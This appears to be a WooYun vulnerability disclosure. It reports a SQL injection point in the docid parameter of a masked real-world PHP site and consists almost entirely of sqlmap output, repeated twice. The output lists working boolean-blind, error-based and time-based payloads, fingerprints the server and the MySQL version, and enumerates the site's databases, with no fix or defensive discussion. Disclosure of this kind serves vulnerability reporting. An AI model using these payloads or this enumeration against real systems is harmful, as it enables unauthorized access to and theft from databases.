WooYun.org

注入点

http://**.**.**.**/view/viewdetail.php?docid=154805

<code>
sqlmap identified the following injection points with a total of 250 HTTP(s) requests:
---
Parameter: docid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: docid=154805 AND 8951=8951
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: docid=154805 AND (SELECT 1655 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1655=1655,1))),0x7178716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind (SELECT)
Payload: docid=154805 OR (SELECT * FROM (SELECT(SLEEP(10)))exsS)
---
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
available databases [2]:
[*] docm
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: docid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: docid=154805 AND 8951=8951
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: docid=154805 AND (SELECT 1655 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1655=1655,1))),0x7178716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind (SELECT)
Payload: docid=154805 OR (SELECT * FROM (SELECT(SLEEP(10)))exsS)
---
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0